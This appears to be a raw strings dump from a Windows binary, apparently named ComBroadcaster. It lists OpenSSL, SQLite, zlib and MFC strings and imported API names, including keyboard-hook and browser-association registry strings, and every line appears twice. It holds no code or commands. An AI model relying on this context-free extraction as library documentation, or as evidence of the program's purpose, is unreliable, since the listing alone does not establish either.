digest and key type not supported
bad password read
bad password read
X509_PKEY_new
X509_PKEY_new
i2d_RSA_PUBKEY
i2d_RSA_PUBKEY
i2d_PublicKey
i2d_PublicKey
i2d_PrivateKey
i2d_PrivateKey
i2d_EC_PUBKEY
i2d_EC_PUBKEY
i2d_DSA_PUBKEY
i2d_DSA_PUBKEY
d2i_X509_PKEY
d2i_X509_PKEY
d2i_PublicKey
d2i_PublicKey
d2i_PrivateKey
d2i_PrivateKey
d2i_AutoPrivateKey
d2i_AutoPrivateKey
unsupported algorithm
unsupported algorithm
unknown key type
unknown key type
unable to get certs public key
unable to get certs public key
public key encode error
public key encode error
public key decode error
public key decode error
no cert set for us to verify
no cert set for us to verify
method not supported
method not supported
loading cert dir
loading cert dir
key values mismatch
key values mismatch
key type mismatch
key type mismatch
cert already in hash table
cert already in hash table
cant check dh key
cant check dh key
X509_verify_cert
X509_verify_cert
X509_STORE_add_cert
X509_STORE_add_cert
X509_REQ_check_private_key
X509_REQ_check_private_key
X509_PUBKEY_set
X509_PUBKEY_set
X509_PUBKEY_get
X509_PUBKEY_get
X509_load_cert_file
X509_load_cert_file
X509_load_cert_crl_file
X509_load_cert_crl_file
X509_get_pubkey_parameters
X509_get_pubkey_parameters
X509_check_private_key
X509_check_private_key
GET_CERT_BY_SUBJECT
GET_CERT_BY_SUBJECT
ADD_CERT_DIR
ADD_CERT_DIR
PKEY_DSA_KEYGEN
PKEY_DSA_KEYGEN
PKEY_DSA_CTRL
PKEY_DSA_CTRL
unsupported key components
unsupported key components
unsupported encryption
unsupported encryption
read key
read key
public key no rsa
public key no rsa
problems getting password
problems getting password
keyblob too short
keyblob too short
keyblob header parse error
keyblob header parse error
expecting public key blob
expecting public key blob
expecting private key blob
expecting private key blob
error converting private key
error converting private key
PEM_WRITE_PRIVATEKEY
PEM_WRITE_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_READ_PRIVATEKEY
PEM_READ_BIO_PRIVATEKEY
PEM_READ_BIO_PRIVATEKEY
PEM_PK8PKEY
PEM_PK8PKEY
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
PEM_F_PEM_WRITE_PKCS8PRIVATEKEY
DO_PK8PKEY_FP
DO_PK8PKEY_FP
DO_PK8PKEY
DO_PK8PKEY
d2i_PKCS8PrivateKey_fp
d2i_PKCS8PrivateKey_fp
d2i_PKCS8PrivateKey_bio
d2i_PKCS8PrivateKey_bio
unsupported salt type
unsupported salt type
unsupported private key algorithm
unsupported private key algorithm
unsupported prf
unsupported prf
unsupported key size
unsupported key size
unsupported key derivation function
unsupported key derivation function
unsupported keylength
unsupported keylength
unsuported number of rounds
unsuported number of rounds
private key encode error
private key encode error
private key decode error
private key decode error
operaton not initialized
operaton not initialized
operation not supported for this keytype
operation not supported for this keytype
no operation set
no operation set
no key set
no key set
keygen failure
keygen failure
invalid operation
invalid operation
expecting a ec key
expecting a ec key
expecting a ecdsa key
expecting a ecdsa key
expecting a dsa key
expecting a dsa key
expecting a dh key
expecting a dh key
expecting an rsa key
expecting an rsa key
different key types
different key types
ctrl operation not implemented
ctrl operation not implemented
command not supported
command not supported
camellia key setup failed
camellia key setup failed
bn pubkey error
bn pubkey error
bad key length
bad key length
aes key setup failed
aes key setup failed
PKEY_SET_TYPE
PKEY_SET_TYPE
PKCS5_v2_PBE_keyivgen
PKCS5_v2_PBE_keyivgen
PKCS5_PBE_keyivgen
PKCS5_PBE_keyivgen
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover_init
EVP_PKEY_verify_recover
EVP_PKEY_verify_recover
EVP_PKEY_verify_init
EVP_PKEY_verify_init
EVP_PKEY_verify
EVP_PKEY_verify
EVP_PKEY_sign_init
EVP_PKEY_sign_init
EVP_PKEY_sign
EVP_PKEY_sign
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen_init
EVP_PKEY_paramgen
EVP_PKEY_paramgen
EVP_PKEY_new
EVP_PKEY_new
EVP_PKEY_keygen_init
EVP_PKEY_keygen_init
EVP_PKEY_keygen
EVP_PKEY_keygen
EVP_PKEY_get1_RSA
EVP_PKEY_get1_RSA
EVP_PKEY_get1_EC_KEY
EVP_PKEY_get1_EC_KEY
EVP_PKEY_GET1_ECDSA
EVP_PKEY_GET1_ECDSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DSA
EVP_PKEY_get1_DH
EVP_PKEY_get1_DH
EVP_PKEY_encrypt_old
EVP_PKEY_encrypt_old
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt_init
EVP_PKEY_encrypt
EVP_PKEY_encrypt
EVP_PKEY_derive_set_peer
EVP_PKEY_derive_set_peer
EVP_PKEY_derive_init
EVP_PKEY_derive_init
EVP_PKEY_derive
EVP_PKEY_derive
EVP_PKEY_decrypt_old
EVP_PKEY_decrypt_old
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt_init
EVP_PKEY_decrypt
EVP_PKEY_decrypt
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_dup
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_ctrl_str
EVP_PKEY_CTX_ctrl
EVP_PKEY_CTX_ctrl
EVP_PKEY_copy_parameters
EVP_PKEY_copy_parameters
EVP_PKEY2PKCS8_broken
EVP_PKEY2PKCS8_broken
EVP_PKCS82PKEY_BROKEN
EVP_PKCS82PKEY_BROKEN
EVP_PKCS82PKEY
EVP_PKCS82PKEY
EVP_CIPHER_CTX_set_key_length
EVP_CIPHER_CTX_set_key_length
ECKEY_PKEY2PKCS8
ECKEY_PKEY2PKCS8
ECDSA_PKEY2PKCS8
ECDSA_PKEY2PKCS8
DSA_PKEY2PKCS8
DSA_PKEY2PKCS8
DSAPKEY2PKCS8
DSAPKEY2PKCS8
D2I_PKEY
D2I_PKEY
CAMELLIA_INIT_KEY
CAMELLIA_INIT_KEY
AES_INIT_KEY
AES_INIT_KEY
invalid public key
invalid public key
PKEY_DH_KEYGEN
PKEY_DH_KEYGEN
PKEY_DH_DERIVE
PKEY_DH_DERIVE
GENERATE_KEY
GENERATE_KEY
COMPUTE_KEY
COMPUTE_KEY
rsa operations not supported
rsa operations not supported
key size too small
key size too small
invalid keybits
invalid keybits
illegal or unsupported padding mode
illegal or unsupported padding mode
digest too big for rsa key
digest too big for rsa key
data too small for key size
data too small for key size
RSA_generate_key
RSA_generate_key
RSA_check_key
RSA_check_key
RSA_BUILTIN_KEYGEN
RSA_BUILTIN_KEYGEN
PKEY_RSA_VERIFYRECOVER
PKEY_RSA_VERIFYRECOVER
PKEY_RSA_SIGN
PKEY_RSA_SIGN
PKEY_RSA_CTRL_STR
PKEY_RSA_CTRL_STR
PKEY_RSA_CTRL
PKEY_RSA_CTRL
inflate 1.2.5 Copyright 1995-2010 Mark Adler
inflate 1.2.5 Copyright 1995-2010 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
-3.7.8
-3.7.8
SQLite format 3
SQLite format 3
CREATE TABLE sqlite_master(
CREATE TABLE sqlite_master(
sql text
sql text
CREATE TEMP TABLE sqlite_temp_master(
CREATE TEMP TABLE sqlite_temp_master(
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
!"#$%&'()* ,-./:;?@[\]^_`{|}~
!"#$%&'()* ,-./:;?@[\]^_`{|}~
%d.%d.%d.%d
%d.%d.%d.%d
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Classes\.html
Software\Classes\.html
debug.txt
debug.txt
unexpected key token
unexpected key token
expected key token
expected key token
,[]{}#&*!|>'"%@`
,[]{}#&*!|>'"%@`
?,[]{}#&*!|>'"%@`
?,[]{}#&*!|>'"%@`
tag:yaml.org,2002:
tag:yaml.org,2002:
#;/?:@&= $,_.!~*'()[]
#;/?:@&= $,_.!~*'()[]
#;/?:@&= $_.~*'
#;/?:@&= $_.~*'
illegal map key
illegal map key
?:,]}%@`
?:,]}%@`
large file support is disabled
large file support is disabled
unknown operation
unknown operation
SQL logic error or missing database
SQL logic error or missing database
foreign_keys
foreign_keys
sqlite_compileoption_get
sqlite_compileoption_get
sqlite_compileoption_used
sqlite_compileoption_used
sqlite_log
sqlite_log
sqlite_source_id
sqlite_source_id
sqlite_version
sqlite_version
sqlite_stat2
sqlite_stat2
sqlite_attach
sqlite_attach
sqlite_detach
sqlite_detach
sqlite_stat1
sqlite_stat1
sqlite_rename_parent
sqlite_rename_parent
sqlite_rename_trigger
sqlite_rename_trigger
sqlite_rename_table
sqlite_rename_table
RowKey
RowKey
SQLITE_
SQLITE_
d-d-d d:d:d
d-d-d d:d:d
d:d:d
d:d:d
d-d-d
d-d-d
failed to allocate %u bytes of memory
failed to allocate %u bytes of memory
failed memory resize %u to %u bytes
failed memory resize %u to %u bytes
922337203685477580
922337203685477580
API call with %s database connection pointer
API call with %s database connection pointer
OsError 0x%x (%u)
OsError 0x%x (%u)
os_win.c:%d: (%d) %s(%s) - %s
os_win.c:%d: (%d) %s(%s) - %s
delayed %dms for lock/sharing conflict
delayed %dms for lock/sharing conflict
%s-shm
%s-shm
%s\etilqs_
%s\etilqs_
Recovered %d frames from WAL file %s
Recovered %d frames from WAL file %s
cannot limit WAL size: %s
cannot limit WAL size: %s
invalid page number %d
invalid page number %d
2nd reference to page %d
2nd reference to page %d
Failed to read ptrmap key=%d
Failed to read ptrmap key=%d
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)
%d of %d pages missing from overflow list starting at %d
%d of %d pages missing from overflow list starting at %d
failed to get page %d
failed to get page %d
freelist leaf count too big on page %d
freelist leaf count too big on page %d
Page %d:
Page %d:
unable to get the page. error code=%d
unable to get the page. error code=%d
btreeInitPage() returns error code %d
btreeInitPage() returns error code %d
On tree page %d cell %d:
On tree page %d cell %d:
On page %d at right child:
On page %d at right child:
Corruption detected in cell %d on page %d
Corruption detected in cell %d on page %d
Multiple uses for byte %d of page %d
Multiple uses for byte %d of page %d
Fragmentation of %d bytes reported as %d on page %d
Fragmentation of %d bytes reported as %d on page %d
Page %d is never used
Page %d is never used
Pointer map page %d is referenced
Pointer map page %d is referenced
Outstanding page count goes from %d to %d during this analysis
Outstanding page count goes from %d to %d during this analysis
unknown database %s
unknown database %s
keyinfo(%d
keyinfo(%d
%s(%d)
%s(%d)
%s-mjX
%s-mjX
foreign key constraint failed
foreign key constraint failed
unable to use function %s in the requested context
unable to use function %s in the requested context
bind on a busy prepared statement: [%s]
bind on a busy prepared statement: [%s]
zeroblob(%d)
zeroblob(%d)
abort at %d in [%s]: %s
abort at %d in [%s]: %s
constraint failed at %d in [%s]
constraint failed at %d in [%s]
cannot open savepoint - SQL statements in progress
cannot open savepoint - SQL statements in progress
no such savepoint: %s
no such savepoint: %s
cannot %s savepoint - SQL statements in progress
cannot %s savepoint - SQL statements in progress
cannot rollback transaction - SQL statements in progress
cannot rollback transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
cannot commit transaction - SQL statements in progress
sqlite_temp_master
sqlite_temp_master
sqlite_master
sqlite_master
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid
cannot change %s wal mode from within a transaction
cannot change %s wal mode from within a transaction
database table is locked: %s
database table is locked: %s
statement aborts at %d: [%s] %s
statement aborts at %d: [%s] %s
cannot open value of type %s
cannot open value of type %s
cannot open virtual table: %s
cannot open virtual table: %s
cannot open view: %s
cannot open view: %s
no such column: "%s"
no such column: "%s"
foreign key
foreign key
indexed
indexed
cannot open %s column for writing
cannot open %s column for writing
misuse of aliased aggregate %s
misuse of aliased aggregate %s
%s: %s.%s.%s
%s: %s.%s.%s
%s: %s.%s
%s: %s.%s
not authorized to use function: %s
not authorized to use function: %s
%r %s BY term out of range - should be between 1 and %d
%r %s BY term out of range - should be between 1 and %d
too many terms in %s BY clause
too many terms in %s BY clause
Expression tree is too large (maximum depth %d)
Expression tree is too large (maximum depth %d)
variable number must be between ?1 and ?%d
variable number must be between ?1 and ?%d
too many SQL variables
too many SQL variables
too many columns in %s
too many columns in %s
EXECUTE %s%s SUBQUERY %d
EXECUTE %s%s SUBQUERY %d
misuse of aggregate: %s()
misuse of aggregate: %s()
%.*s"%w"%s
%.*s"%w"%s
%s%.*s"%w"
%s%.*s"%w"
%s OR name=%Q
%s OR name=%Q
type='trigger' AND (%s)
type='trigger' AND (%s)
sqlite_
sqlite_
table %s may not be altered
table %s may not be altered
there is already another table or index with this name: %s
there is already another table or index with this name: %s
view %s may not be altered
view %s may not be altered
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
sqlite_sequence
sqlite_sequence
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Cannot add a PRIMARY KEY column
Cannot add a PRIMARY KEY column
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q
sqlite_altertab_%s
sqlite_altertab_%s
CREATE TABLE %Q.%s(%s)
CREATE TABLE %Q.%s(%s)
DELETE FROM %Q.%s WHERE %s=%Q
DELETE FROM %Q.%s WHERE %s=%Q
SELECT tbl, idx, stat FROM %Q.sqlite_stat1
SELECT tbl, idx, stat FROM %Q.sqlite_stat1
invalid name: "%s"
invalid name: "%s"
too many attached databases - max %d
too many attached databases - max %d
database %s is already in use
database %s is already in use
unable to open database: %s
unable to open database: %s
no such database: %s
no such database: %s
cannot detach database %s
cannot detach database %s
database %s is locked
database %s is locked
%s %T cannot reference objects in database %s
%s %T cannot reference objects in database %s
access to %s.%s.%s is prohibited
access to %s.%s.%s is prohibited
access to %s.%s is prohibited
access to %s.%s is prohibited
object name reserved for internal use: %s
object name reserved for internal use: %s
there is already an index named %s
there is already an index named %s
too many columns on %s
too many columns on %s
duplicate column name: %s
duplicate column name: %s
default value of column [%s] is not constant
default value of column [%s] is not constant
table "%s" has more than one primary key
table "%s" has more than one primary key
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY
no such collation sequence: %s
no such collation sequence: %s
CREATE %s %.*s
CREATE %s %.*s
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d
CREATE TABLE %Q.sqlite_sequence(name,seq)
CREATE TABLE %Q.sqlite_sequence(name,seq)
view %s is circularly defined
view %s is circularly defined
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d
table %s may not be dropped
table %s may not be dropped
use DROP TABLE to delete table %s
use DROP TABLE to delete table %s
use DROP VIEW to delete view %s
use DROP VIEW to delete view %s
DELETE FROM %s.sqlite_sequence WHERE name=%Q
DELETE FROM %s.sqlite_sequence WHERE name=%Q
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'
foreign key on %s should reference only one column of table %T
foreign key on %s should reference only one column of table %T
number of columns in foreign key does not match the number of columns in the referenced table
number of columns in foreign key does not match the number of columns in the referenced table
unknown column "%s" in foreign key definition
unknown column "%s" in foreign key definition
indexed columns are not unique
indexed columns are not unique
table %s may not be indexed
table %s may not be indexed
views may not be indexed
views may not be indexed
virtual tables may not be indexed
virtual tables may not be indexed
there is already a table named %s
there is already a table named %s
index %s already exists
index %s already exists
sqlite_autoindex_%s_%d
sqlite_autoindex_%s_%d
table %s has no column named %s
table %s has no column named %s
CREATE%s INDEX %.*s
CREATE%s INDEX %.*s
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
no such index: %S
no such index: %S
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
DELETE FROM %Q.%s WHERE name=%Q AND type='index'
a JOIN clause is required before %s
a JOIN clause is required before %s
unable to identify the object to be reindexed
unable to identify the object to be reindexed
table %s may not be modified
table %s may not be modified
cannot modify %s because it is a view
cannot modify %s because it is a view
foreign key mismatch
foreign key mismatch
table %S has %d columns but %d values were supplied
table %S has %d columns but %d values were supplied
%d values for %d columns
%d values for %d columns
table %S has no column named %s
table %S has no column named %s
%s.%s may not be NULL
%s.%s may not be NULL
PRIMARY KEY must be unique
PRIMARY KEY must be unique
sqlite3_extension_init
sqlite3_extension_init
unable to open shared library [%s]
unable to open shared library [%s]
no entry point [%s] in shared library [%s]
no entry point [%s] in shared library [%s]
error during initialization: %s
error during initialization: %s
automatic extension loading failed: %s
automatic extension loading failed: %s
foreign_key_list
foreign_key_list
*** in database %s ***
*** in database %s ***
unsupported encoding: %s
unsupported encoding: %s
malformed database schema (%s)
malformed database schema (%s)
%s - %s
%s - %s
unsupported file format
unsupported file format
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid
database schema is locked: %s
database schema is locked: %s
unknown or unsupported join type: %T %T%s%T
unknown or unsupported join type: %T %T%s%T
RIGHT and FULL OUTER JOINs are not currently supported
RIGHT and FULL OUTER JOINs are not currently supported
a NATURAL join may not have an ON or USING clause
a NATURAL join may not have an ON or USING clause
cannot have both ON and USING clauses in the same join
cannot have both ON and USING clauses in the same join
cannot join using column %s - column not present in both tables
cannot join using column %s - column not present in both tables
USE TEMP B-TREE FOR %s
USE TEMP B-TREE FOR %s
COMPOUND SUBQUERIES %d AND %d %s(%s)
COMPOUND SUBQUERIES %d AND %d %s(%s)
%s.%s
%s.%s
%s:%d
%s:%d
ORDER BY clause should come after %s not before
ORDER BY clause should come after %s not before
LIMIT clause should come after %s not before
LIMIT clause should come after %s not before
SELECTs to the left and right of %s do not have the same number of result columns
SELECTs to the left and right of %s do not have the same number of result columns
no such index: %s
no such index: %s
sqlite_subquery_%p_
sqlite_subquery_%p_
no such table: %s
no such table: %s
SCAN TABLE %s %s%s(~%d rows)
SCAN TABLE %s %s%s(~%d rows)
sqlite3_get_table() called with two or more incompatible queries
sqlite3_get_table() called with two or more incompatible queries
cannot create %s trigger on view: %S
cannot create %s trigger on view: %S
cannot create INSTEAD OF trigger on table: %S
cannot create INSTEAD OF trigger on table: %S
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')
no such trigger: %S
no such trigger: %S
-- TRIGGER %s
-- TRIGGER %s
no such column: %s
no such column: %s
cannot VACUUM - SQL statements in progress
cannot VACUUM - SQL statements in progress
PRAGMA vacuum_db.synchronous=OFF
PRAGMA vacuum_db.synchronous=OFF
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d
vtable constructor failed: %s
vtable constructor failed: %s
vtable constructor did not declare schema: %s
vtable constructor did not declare schema: %s
no such module: %s
no such module: %s
table %s: xBestIndex returned an invalid plan
table %s: xBestIndex returned an invalid plan
%s SUBQUERY %d
%s SUBQUERY %d
%s TABLE %s
%s TABLE %s
%s AS %s
%s AS %s
%s USING %s%sINDEX%s%s%s
%s USING %s%sINDEX%s%s%s
%s USING INTEGER PRIMARY KEY
%s USING INTEGER PRIMARY KEY
%s (rowid=?)
%s (rowid=?)
%s (rowid>? AND rowid)
%s (rowid>? AND rowid)
%s (rowid>?)
%s (rowid>?)
%s (rowid)
%s (rowid)
%s VIRTUAL TABLE INDEX %d:%s
%s VIRTUAL TABLE INDEX %d:%s
%s (~%lld rows)
%s (~%lld rows)
at most %d tables in a join
at most %d tables in a join
cannot use index: %s
cannot use index: %s
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers
unable to close due to unfinished backup operation
unable to close due to unfinished backup operation
unknown database: %s
unknown database: %s
no such %s mode: %s
no such %s mode: %s
%s mode not allowed: %s
%s mode not allowed: %s
no such vfs: %s
no such vfs: %s
database corruption at line %d of [%.10s]
database corruption at line %d of [%.10s]
misuse at line %d of [%.10s]
misuse at line %d of [%.10s]
cannot open file at line %d of [%.10s]
cannot open file at line %d of [%.10s]
1.2.5
1.2.5
C:\appbuilder_v2\src\ComBroadcaster-1.10\Release\ComBroadcaster.pdb
C:\appbuilder_v2\src\ComBroadcaster-1.10\Release\ComBroadcaster.pdb
SHELL32.dll
SHELL32.dll
RPCRT4.dll
RPCRT4.dll
GetWindowsDirectoryW
GetWindowsDirectoryW
GetCPInfo
GetCPInfo
PeekNamedPipe
PeekNamedPipe
GetProcessHeap
GetProcessHeap
KERNEL32.dll
KERNEL32.dll
EnumChildWindows
EnumChildWindows
EnumWindows
EnumWindows
UnhookWindowsHookEx
UnhookWindowsHookEx
GetKeyState
GetKeyState
SetWindowsHookExW
SetWindowsHookExW
MapVirtualKeyW
MapVirtualKeyW
GetAsyncKeyState
GetAsyncKeyState
CreateDialogIndirectParamW
CreateDialogIndirectParamW
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
GetKeyNameTextW
GetKeyNameTextW
MapVirtualKeyExW
MapVirtualKeyExW
USER32.dll
USER32.dll
GetViewportExtEx
GetViewportExtEx
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
WINSPOOL.DRV
WINSPOOL.DRV
COMDLG32.dll
COMDLG32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegDeleteKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteW
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
SHLWAPI.dll
SHLWAPI.dll
MSIMG32.dll
MSIMG32.dll
COMCTL32.dll
COMCTL32.dll
OLEACC.dll
OLEACC.dll
GdiplusShutdown
GdiplusShutdown
gdiplus.dll
gdiplus.dll
IMM32.dll
IMM32.dll
SHFileOperationW
SHFileOperationW
VERSION.dll
VERSION.dll
WS2_32.dll
WS2_32.dll
WINMM.dll
WINMM.dll
WLDAP32.dll
WLDAP32.dll
ReportEventA
ReportEventA
.?AUDWebBrowserEvents2@@
.?AUDWebBrowserEvents2@@
.PAVCException@@
.PAVCException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCObject@@
.PAVCObject@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCOleException@@
.PAVCOleException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCUserException@@
.PAVCUserException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCFileException@@
.PAVCFileException@@
.?AVCMDITabProxyWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMDIFrameWnd@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@
